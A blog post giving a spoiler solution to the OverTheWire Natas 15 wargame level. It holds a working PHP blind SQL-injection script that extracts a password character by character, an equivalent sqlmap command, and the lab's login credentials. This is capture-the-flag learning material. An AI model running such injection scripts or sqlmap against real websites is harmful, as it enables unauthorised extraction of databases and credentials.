Daniels Blog
13Dez/160

Overthewire Wargame – Natas 15 [spoiler]

This is my solution for Natas 15 (http://overthewire.org/wargames/natas/natas15.html).
This has been my first time trying to do a blind SQL-injection so it took some time and reading to
finaly succeed. This very nice writeup tought me the technique i am using in my code: (http://sqlinjections.blogspot.de/2009/04/sql-injection-tutorial-by-marezzi-mysql.html)

Natas 15 was real fun. I learned a lot and I couldn't believe that I finaly made it work (after 6 hours or so) 😉

#!/usr/bin/php

function send_req($inject)
{
    
    $u = "natas15";
    $p = "AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J";
 
    $inject = urlencode($inject);

    $url = "http://$u:$p@natas15.natas.labs.overthewire.org/?username=$inject&debug=1";
    
    $data = file($url);
    
    $data = $data[13];
    if (str_replace("doesn't","",$data)!=$data)
    $success = 0;
    else
    $success = 1;
    
    return($success);  
}

function probe_offset($offset)
{
    $char = 47;

    while ($char < 130) { $inj = 'natas16" and ascii(substring((SELECT password from users where username="natas16"),' . $offset . ',1))>' . $char . '-- -';
    $res = send_req($inj);

    echo ".";
    if ($res == 0)
    {
    return(chr($char));
    } 
    $char ++;
    }

}

$pass = "";
$offset = 1;
while ($offset < 33)
{
$good = probe_offset($offset);
echo $good;
$offset++;
$pass .= $good;
}

echo "\n\n Here we go :) $pass  \n\n";




If you are lazy, you could have used sqlmap:

sqlmap -u natas15.natas.labs.overthewire.org/index.php?username=natas16 --auth-cred=natas15:AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J --auth-type=Basic --dbms=mysql --string=exists --level=3  --batch --current-db -T users -D natas15 -a

hat dir dieser Artikel gefallen?

Dann abonniere doch diesen Blog per RSS Feed!

veröffentlicht unter: Linux Kommentar schreiben
Kommentare (0) Trackbacks (0)

Zu diesem Artikel wurden noch keine Kommentare geschrieben.


Leave a comment

Noch keine Trackbacks.